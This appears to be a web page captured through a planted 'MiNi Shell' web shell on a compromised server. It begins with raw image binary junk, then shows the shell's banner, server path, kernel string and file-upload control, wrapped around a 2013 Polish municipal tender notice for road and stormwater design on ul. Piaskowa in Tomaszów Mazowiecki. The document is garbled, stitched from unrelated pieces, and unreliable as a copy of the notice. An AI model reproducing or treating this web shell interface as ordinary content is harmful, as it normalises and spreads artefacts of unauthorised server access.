JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131022/220415-N-2013.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Dokumentacja na budowę ul. Piaskowej.</b><br>
<b>Numer ogłoszenia: 220415 - 2013; data zamieszczenia: 22.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Tomaszów Mazowiecki , ul. POW 10/16, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 724 23 11, faks 44 724 43 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-maz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja na budowę ul. Piaskowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: kompleksowy projekt budowlano wykonawczy przebudowy ulicy Piaskowej ze skrzyżowaniami i towarzyszącymi instalacjami na odcinku od ul. Warszawskiej do ul. Zajęczej w  Tomaszowie Mazowieckim, oraz pozyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID). Parametry projektowe ulica Piaskowa  droga gminna nr G100140, klasa drogi: L Lokalna z dwoma pasami ruchu,ulica Warszawska droga krajowa nr 48, ulica Zajęcza  droga gminna wewnętrzna.Planowane urządzenia w pasie ulicznym odwodnienie, kanalizacja deszczowa,w przypadku konieczności przebudowa i rozbudowa oświetlenia ulicznego, przyłącza sanitarne w obrębie pasa drogowego dla nieruchomości nie posiadających takich przyłączy. Koncepcja kanalizacji deszczowej oraz zagospodarowanie pasów drogowych na mapach do celów opiniodawczych w ulicach: Północna, Smolna, Lubocheńska, Zajęcza, Jelenia, Grzybowa, Leśna, Dębowa, Duracza. Koncepcja winna uwzględniać: zagospodarowanie pasów drogowych układ geometryczny jezdni, chodników wraz z rozwiązaniami wysokościowymi w branży drogowej oraz odwodnienia,analizę ewentualnej rozbudowy oświetlenia ulicznego,analizę kolizji z urządzeniami niezwiązanymi z drogą, analizę kosztów poszczególnych ulic z wyszczególnieniem branży drogowej i instalacyjnej.Zakres opracowania, Wstępne prace projektowe polegajace na ustaleniu rozwiązań planowanego przedsięwzięcia w tym projekt linii rozgraniczających pasa drogowego, podziałów nieruchomości, projekt przebiegu kanalizacji deszczowej wraz z lokalizacja wylotu do rzeki Czarnej, zaopiniowane pozytywnie przez Zamawiającego. Decyzja o środowiskowych uwarunkowaniach na realizację przedsięwzięcia. Wykonawca uzyska decyzję o uwarunkowaniach środowiskowych zgodnie w wymaganiami art. 46, 49 ustawy z dnia 27 kwietnia 2001r. - Prawo ochrony środowiska wraz z Raportem o oddziaływaniu przedsięwzięcia na środowisko jeżeli jest wymagany. Projektant powinien rozeznać konieczność wykonania raportu oddziaływania na środowisko i jeśli uzna, że będzie wymagany, powinien je ująć w cenie oferty, bowiem Zamawiający nie będzie dodatkowo z tego tytułu zwiększał kosztów wykonania umowy.  Dokumentacja projektowa.  Wykonanie dokumentacji projektowej PB i PW, STWiORB oraz części kosztowej wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) obejmuje wykonanie: Mapa do celow projektowych  z naniesionymi granicami działek, wjazdami i ogrodzeniami w obrębie opracowania. Zieleń drogowa. Należy dokonać inwentaryzacji istniejących drzew i krzewów oraz wytypować rośliny do wycięcia i zabezpieczenia. operat wodnoprawny wraz z uzyskaniem prawomocnych decyzji pozwolenie wodnoprawne dla realizacji inwestycji. Dokumentacja geologiczno  inzynierska z geotechnicznymi warunkami posadowienia obiektów.Kolizje z uzbrojeniami niezwiązanymi z drogą. Uwzględnić w opracowaniu lokalizację przebudowywanych urządzeń niezwiązanych z drogą i kolidujących z jej budową zgodnie z przepisami art. 32 ustawy o drogach publicznych. Uzgodnienia z gestorami kolidujących sieci winny odbywać się w porozumieniu z Zamawiającym. Wykonawca pozyska warunki techniczne przebudowy uzbrojenia kolidujacego z budową ulicy. Rozwiązanie kolizji należy wykonać w oddzielnych tomach dla każdej branży osobno.  Projekty podziałów działek. Orientacyjna ilość działek do podziału - 25 szt. Należy dokonać projekty podziałów działek do decyzji ZRiD wraz z wykonaniem wykazu zmian gruntowych dotyczących przedmiotowych działek oraz uzyskać decyzje ZRiD. Na zajęcie czasowe gruntów dla realizacji inwestycji należy uzyskać zgody właścicieli działek. Ilość działek przeznaczonych do podziału - wg przyjętych przez wykonawcę rozwiązań.  Projekty podziałów nieruchomości mapy podziałowe powinny być przedłożone Zamawiającemu do wglądu jeszcze przed ich przyjęciem do zasobu geodezyjnego i kartograficznego w celu dokonania ich szczególnej weryfikacji przez Zamawiającego. Mapy podziałowe winny uwzględniać wszystkie nieruchomości objęte liniami rozgraniczajacymi teren inwestycji, tj. również działki ewidencyjne objęte liniami rozgraniczającymi w całości, nawet w przypadku gdy samodzielnie stanowią odrębną nieruchomość. Mapy podziałowe winny zawierać wykazy zmian gruntowych z wyraźnym wyróżnieniem działek niezbędnych do realizacji inwestycji oraz wykazy synchronizacyjne stanu prawnego nieruchomości wykazanego w katastrze nieruchomości ze stanem uwidocznionym w księgach wieczystych. W trakcie sporządzania zbiorczego wykazu zmian gruntowych, w przypadku podziału działek, do wniosku o wydanie decyzji ZRiD, należy sporzadzić projekty jednostkowych map podziałowych oddzielnie dla każdej nieruchomości. W przypadku nieruchomości nie podlegającej podziałowi do wniosku o wydanie decyzji ZRiD należy załączyć wypisy i wyrysy z operatu ewidencji gruntów lub mapy do celów projektowych. Pozwolenia na rozbiórkę. Przygotowanie dokumentacji wg przepisów Prawa Budowlanego dla budynków dla których zachodzi konieczność wyburzenia. Stała organizacja ruchu.  Organizacja ruchu na czas prowadzenia robót. Odwodnienie. Odwodnienie poprzez spadki podłużne i poprzeczne do zaprojektowanej w ramach niniejszego zadania kanalizacji deszczowej do istniejącego odbiornika - rzeki Czarnej, ewentualnie w części włączenie do kanalizacji deszczowej w ul. Warszawskiej. Proponowany przebieg kanału deszczowego od ul. Piaskowej do rzeki Czarnej - na działkach o numerach ewidencyjnych 414 2, 415, 421, 423 w obrębie 1, numerze ewidencyjnym 103 w obrębie 4, numerze ewidencyjnym 1 19 w obrębie 3. Szczegółowe położenie ww. odcinka kanału należy uzgodnić z firmą Boshoku Automotive Poland Sp. z o.o. z/s przy ul. Piaskowej 120 w Tomaszowie Maz. Na wylotach do ulic bocznych zaprojektować odejścia kanalizacji deszczowej. Dokonać obliczeń niezbędnych do ustalenia przekrojów urządzeń odwadniajacych. Wykonać operat wodnoprawny na wykonanie wylotu oczyszczonych spływów deszczowych do rzeki Czarnej. Uzyskać pozwolenie wodnoprawne na wykonanie wylotu  i odprowadzenie wód deszczowych i roztopowych z przyległej zlewni do rzeki Czarnej.Uzyskać stosowne uzgodnienia, decyzje, umowy umowy użyczenia, użytkowania z Zarządem Melioracji i Urządzeń Wodnych, Zarządem Gospodarki Wodnej  w celu wykonania robót i poźniejszej eksploatacji zgodnie z warunkami uzyskanego pozwolenia wodnoprawnego, oraz w celu uzyskania decyzji ZRID.  Sieci inne wodno kanalizacyjne. Odgałęzienia sanitarne do działek  nie posiadających przyłączy. Odgałęzienia te należy projektować w obrębie pasa drogowego. Położenie ww. odgałęzień projektować w uzgodnieniu z właścicielami nieruchomości.Oświetlenie uliczne. W przypadku konieczności przebudowa i rozbudowa oświetlenia ulicznego.Branża drogowa. Dokumentacja techniczna winna uwzględniać:materiały brukarskie betonowe wibroprasowane,  na skrętach krawężniki łukowe, w lokalizacji chodnika wzdłuż krawężnika dwa rzędy kostki koloru czerwonego;zaleca się lokalizować chodniki od strony linii rozgraniczajacych pasa drogowego;jezdnię o nawierzchni z mas bitumicznych; lokalizacja nowych zjazdów (jeśli wystąpią nieruchomości nieogrodzone oraz bez bram wjazdowych) powinna być potwierdzona pisemmym uzgodnieniem i zatwierdzeniem  właścicieli działek, do których zjazdy prowadzą;zjazdy indywidualne i publiczne  dostosowane do wymagań wynikających z usytuowania, przeznaczenia, dostosowane do wymagań bezpieczeństwa ruchu na drodze, wymiarów i gabarytowych pojazdów dla których są przeznaczone oraz do wymagań ruchu pieszych;połączenie projektowanej ulicy Piaskowej z ulicą Warszawską droga krajowa nr 48  wraz z niezbędnymi  uzgodnieniami z Zarządem Dróg Krajowych oraz decyzją o pozwolenie na budowę/przebudowę skrzyżowania; doposażenie zwieńczenia istniejących studzienek rewizyjnych sanitarnych w typowe pierścienie odciążajace;rozbiórkę nieczynnego kanału ciepłowniczego;wymianę słupów A owych na wirowe w miejscach kolizji z chodnikami oraz w obrębie skrzyżowań.uzyskanie pozwolenia na rozbiórkę obiektów budowlanych jeśli taka zgoda będzie   wymagana, budowę bądź przebudowę innych elementów zagospodarowania terenu kolidujących z urządzeniami drogowymi.Projekt wykonawczy powinien uzupełniać i uszczegółowić projekt budowlany tak, aby była możliwość sporządzenia szczegółowego i ostatecznego przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez wykonawcę oraz realizacja robót. Stadium projektu wykonawczego powinno zawierać m.in. następujące składniki i obejmujące wszystkie planowane obiekty, instalacje i urządzenia:materiały wraz z potrzebnymi uzupełnieniami, opiniami, uzgodnieniami i wymaganymi pozwoleniami z punktu widzenia wykonawstwa;rysunki wykonawcze;projekty technologii robót, opisy i rysunki dotyczące organizacji robót i technologii;opracowanie geodezyjne projektu zagospodarowania terenu,specyfikacje techniczne, część przedmiarowo-kosztorysową (kosztorys ślepy i inwestorski).Decyzja o zezwoleniu na realizacje inwestycji drogowej. Należy sporządzić i uzyskać wszystkie niezbędne dokumenty i materiały celem uzyskania decyzji ZRiD oraz uzyskać decyzje ZRiD.Wnioski wraz z materiałami do decyzji ZRiD - winny być zgodne z art. 11d ustawy o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.Na planie (planach) zagospodarowania terenu, wchodzących w skład projektu budowlanego, należy oznaczyć w sposób czytelny i jednoznaczny zakres inwestycji objętej wnioskiem ze szczególnym uwzględnieniem linii rozgraniczających tereny inwestycji, granic, numerów działek istniejacych i nowych - zgodnie z wnioskowanym podziałem nieruchomości oraz terenów zajmowanych czasowo.Przed złożeniem wniosku o wydanie decyzji ZRiD Wykonawca złoży do Zamawiajacego jeden komplet dokumentacji projektowej stanowiącej załącznik do wniosku o ww. decyzję..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 2 000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełni warunek, jeżeli wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał, co najmniej
dwie usługi mających za przedmiot wykonanie projektu budowlanego budowy i, lub przebudowy  dróg lub ulic o długości co najmniej 800 m dla każdej z wykazanych usług, oraz potwierdzenie dokumentami, że prace te zostały wykonane należycie. Dwie usługi mających za przedmiot wykonanie projektu budowlanego kanalizacji deszczowej lub sanitarnej o długości kanału zbiorczego bez przykanalików i podejść co najmniej 800 m każdej z wykazanych usług, oraz potwierdzenie dokumentami, że prace te zostały wykonane należycie. Projekty kanalizacji sanitarnej lub deszczowej mogą być elementem projektów dróg lub ulic.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował personelem w zakresie następujących stanowisk:co najmniej 1 osoba posiadająca uprawnienia do projektowania w specjalności drogowej lub odpowiadające im równoważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
co najmniej 1 osoba posiadająca uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wodociągowych i kanalizacyjnych, lub odpowiadające im równoważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
co najmniej 1 osoba posiadająca uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, lub odpowiadające im równoważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz Oferty,
Pełnomocnictwo, jeżeli dotyczy,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmiany terminu realizacji przedmiotu umowy jedynie w przypadku zaistnienia okoliczności niezależnych od stron umowy, których nie można było przewidzieć w chwili jej zawarcia. Okolicznościami takimi będą - po spełnieniu pierwszej przesłanki - w szczególności:
1)	zmiana przepisów prawnych istotnych dla realizacji przedmiotu umowy;
2)	zmiany przepisów prawnych powodujących konieczność uzyskania dokumentów, które te przepisy narzucają;
3)	działania lub zaniechania osób trzecich (np. organów administracji publicznej i innych podmiotów uczestniczących w procedurze opiniowania i uchwalania);
4)	złożenie skargi lub wniosku do właściwych organów administracyjnych    lub sądowych lub odwołania od ich rozstrzygnięcia, o ile będą mogły mieć wpływ na zmianę terminu realizacji poszczególnych etapów;
5)	ograniczenia w dostępie do terenu istotne dla realizacji przedmiotu umowy,
6)	działania siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a których strony umowy nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie umowy zgodnie z jej treścią w szczególności: wojnę, działania wojenne, akty wandalizmu, awarie, katastrofy;
7)	zmiany korzystne dla zamawiajacego zmierzające do przyspieszenia zakończenia robót, zmniejszających koszty poprawiających, sprawność lub jakość robót,
8)	realizacja w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań,
9)	zmiana terminów umownych zobowiązuje wykonawcę do zmiany harmonogramu.

2.	Zamawiający dopuszcza zmianę osób wskazanych do pełnienia funkcji koordynatorów i projektantów z zachowaniem ciągłości ich pracy. W celu dokonania zmiany osób wykonawca zobowiązany jest uzgodnić nową kandydaturę z zamawiającym i przedstawić dokumenty potwierdzające uprawnienia, kwalifikacje i staż wymagany dla tego stanowiska określone w ogłoszeniu o zamówieniu publicznym oraz SIWZ,
3.	Zamawiający dopuszcza możliwość zmiany wynagrodzenia w przypadku ustawowej zmiany podatku od towarów i usług (VAT) o wartość wynikającą z tej zmiany.
4.	Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia za wykonanie usługi w sytuacji o której mowa w par. 9 ust. 4 pkt 2 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-maz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Mościckiego 6 pok. nr 6.
97-200 Tomaszów Maz. - Wydział Inwestycji..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2013 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Tomaszowie Maz. ul. POW 10/16 pok. 12 budynek A kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com